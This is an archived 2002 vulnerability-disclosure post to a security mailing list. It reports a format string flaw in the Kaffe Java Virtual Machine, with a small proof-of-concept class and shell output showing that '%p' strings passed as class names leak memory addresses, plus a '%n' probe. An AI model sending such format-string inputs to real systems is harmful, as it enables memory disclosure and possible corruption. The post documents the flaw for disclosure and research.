Vulnerability Development mailing list archives
Latest Kaffe Java Virtual Machine Format Strings issue.
From: KF <dotslash () snosoft com>
Date: Tue, 05 Mar 2002 12:07:17 -0500
Ok I sent this out twice already... I don't know what happened... I got zero response from vuln-dev or from the Vendor for that matter... so lets try again... The latest version of kaffe JVM and most of the older versions I tested are vuln to format strings attack... Below are 2 local examples...one from the java command line and one malicious class file. Perhaps this could be remotely exploited via a servlet engine or something that server out jsp pages...maybe even a malicious .class could take advantage of it (example provided) with java.lang.Class.forName(). I think it needs to be addressed either way. This was sent to the kaffe authors email address with no response as well as posted on their bugtracking forum thing which I can't seem to figure out how to navigate...so there was an attempt at vendor notification.
-KF [root@localhost root]# cat > test.java class test { public static void main(String args[]) throws Exception { Class c = Class.forName("%p"); } } [root@localhost root]# javac test.java [root@localhost root]# java testjava.lang.NoClassDefFoundError: 0x4003256a <---------------- note the memory address here.
at java.lang.Class.forName(Class.java:native) at java.lang.Class.forName(Class.java:52) at test.main(test.java:6) [root@localhost root]# rpm -ivh kaffe-1.0.6-6.i386.rpmPreparing... ########################################### [100%] 1:kaffe ########################################### [100%]
[root@localhost root]# which kaffe /usr/bin/kaffe [root@localhost root]# kaffe -version Kaffe Virtual Machine Copyright (c) 1996-2000 Transvirtual Technologies, Inc. All rights reserved Engine: Just-in-time v3 Version: 1.0.6 Java Version: 1.1 [root@localhost root]# kaffe %p.%p.%p.%p.%pjava.lang.NoClassDefFoundError: 0x4003256a/0x4006fa14/0xbfffee98/0xbfffed80/0x40033910
at java.lang.Class.forName(Class.java:native) at java.lang.Class.forName(Class.java:52) [root@localhost root]# kaffe %n -KF
Current thread:
- Latest Kaffe Java Virtual Machine Format Strings issue. KF (Mar 05)